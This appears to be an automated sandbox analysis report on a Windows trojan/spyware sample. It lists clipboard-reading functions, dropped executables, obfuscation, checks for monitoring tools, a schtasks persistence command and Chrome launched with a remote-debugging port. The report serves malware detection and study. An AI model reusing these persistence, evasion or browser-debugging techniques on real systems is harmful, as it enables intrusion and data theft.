Source: chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000004.00000002.2043917021.0000181400C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000004.00000002.2041134001.0000181400710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040711125.000018140065C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000004.00000002.2040599115.000018140060C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000004.00000002.2041568207.000018140080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000004.00000002.2042257265.0000181400960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2041696987.0000181400854000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000004.00000002.2042257265.0000181400960000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2038902736.00001814001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2041696987.0000181400854000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000004.00000002.2047888010.0000181400E74000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000004.00000002.2043716408.0000181400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2041167199.0000181400728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040205160.00001814004EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040456212.00001814005B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000004.00000002.2041167199.0000181400728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
Source: chrome.exe, 00000004.00000002.2040100309.00001814004B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000004.00000002.2042740755.0000181400A84000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000004.00000002.2038029637.000018140001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040456212.00001814005B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000004.00000002.2038976352.000018140020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2044313342.0000181400C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000004.00000002.2040100309.00001814004B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000004.00000002.2039193463.00001814002D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.2040946827.00001814006D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0E9C22
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0E9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 8_2_6C0E9D11
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 8_2_6C0E9E27

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\file.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_006051B0 8_2_006051B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00603E20 8_2_00603E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C112CCE 8_2_6C112CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0DCD00 8_2_6C0DCD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0DEE50 8_2_6C0DEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E0FC0 8_2_6C0E0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C120AC0 8_2_6C120AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E44F0 8_2_6C0E44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1146E0 8_2_6C1146E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1107D0 8_2_6C1107D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1087C0 8_2_6C1087C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C120060 8_2_6C120060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C112090 8_2_6C112090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C102360 8_2_6C102360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C12DC70 8_2_6C12DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E5880 8_2_6C0E5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1098F0 8_2_6C1098F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C117A20 8_2_6C117A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11DBEE 8_2_6C11DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11140E 8_2_6C11140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C121510 8_2_6C121510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11F610 8_2_6C11F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0FF760 8_2_6C0FF760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0D3000 8_2_6C0D3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1950D0 8_2_6C1950D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0E70C0 8_2_6C0E70C0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\service123.exe 05466AC3A1F09726E552D0CBF3BAC625A7EB7944CEDF812F60B066DCBD74AFB1
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll C11792DFC9F60EE410C105F2E44E32019AA128F6E1714DEFB1812956DAF3113C
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A3B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A36E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C19ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A3820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A5A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C1A3560 appears 43 times
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 1140
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: ivdotsri ZLIB complexity 0.9947326007656747
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@17/7@10/4
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\DGdQGkLyQR Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2180
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\JStVXPURjEhqLJtWBhCN
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000004.00000002.2041038398.000018140070B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: file.exe ReversingLabs: Detection: 36%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2284,i,475624526408043289,8302134231628123447,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 1140
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2284,i,475624526408043289,8302134231628123447,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: file.exe Static file information: File size 4373504 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x277800
Source: file.exe Static PE information: Raw size of ivdotsri is bigger than: 0x100000 < 0x1b0a00
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_00608230 LoadLibraryA,GetProcAddress,FreeLibrary,SleepEx,GetLastError, 8_2_00608230
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x42c664 should be: 0x42d8c0
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: ivdotsri
Source: file.exe Static PE information: section name: cxbxaeve
Source: file.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: unmYCIPOHmXNjqOesrEy.dll.0.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_0060A499 push es; iretd 8_2_0060A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C180C30 push eax; mov dword ptr [esp], edi 8_2_6C180DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C14ED10 push eax; mov dword ptr [esp], ebx 8_2_6C14EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C124E31 push eax; mov dword ptr [esp], ebx 8_2_6C124E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C118E7A push edx; mov dword ptr [esp], ebx 8_2_6C118E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11A947 push eax; mov dword ptr [esp], ebx 8_2_6C11A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C14EAB0 push eax; mov dword ptr [esp], ebx 8_2_6C14EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C120AA2 push eax; mov dword ptr [esp], ebx 8_2_6C120AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C138AA0 push eax; mov dword ptr [esp], ebx 8_2_6C13909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C122AAC push edx; mov dword ptr [esp], ebx 8_2_6C122AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C152BF0 push eax; mov dword ptr [esp], ebx 8_2_6C152F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C152BF0 push edx; mov dword ptr [esp], ebx 8_2_6C152F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C118435 push edx; mov dword ptr [esp], ebx 8_2_6C118449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C138460 push eax; mov dword ptr [esp], ebx 8_2_6C138A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11048B push eax; mov dword ptr [esp], ebx 8_2_6C1104A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1104E0 push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F1CFA push eax; mov dword ptr [esp], ebx 8_2_6C1A6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0F1CFA push eax; mov dword ptr [esp], ebx 8_2_6C1A6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11A5A7 push eax; mov dword ptr [esp], ebx 8_2_6C11A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C152620 push eax; mov dword ptr [esp], ebx 8_2_6C152954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C152620 push edx; mov dword ptr [esp], ebx 8_2_6C152973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1606B0 push eax; mov dword ptr [esp], ebx 8_2_6C160A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1106A2 push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1286A1 push 890005EAh; ret 8_2_6C1286A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1106A6 push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1166F3 push edx; mov dword ptr [esp], ebx 8_2_6C116707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1106FD push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11070E push eax; mov dword ptr [esp], ebx 8_2_6C1106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C11A777 push eax; mov dword ptr [esp], ebx 8_2_6C11A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C120042 push eax; mov dword ptr [esp], ebx 8_2_6C120056
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0EE0D0 push eax; mov dword ptr [esp], ebx 8_2_6C1A6AF6
Source: file.exe Static PE information: section name: ivdotsri entropy: 7.955785869140862
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
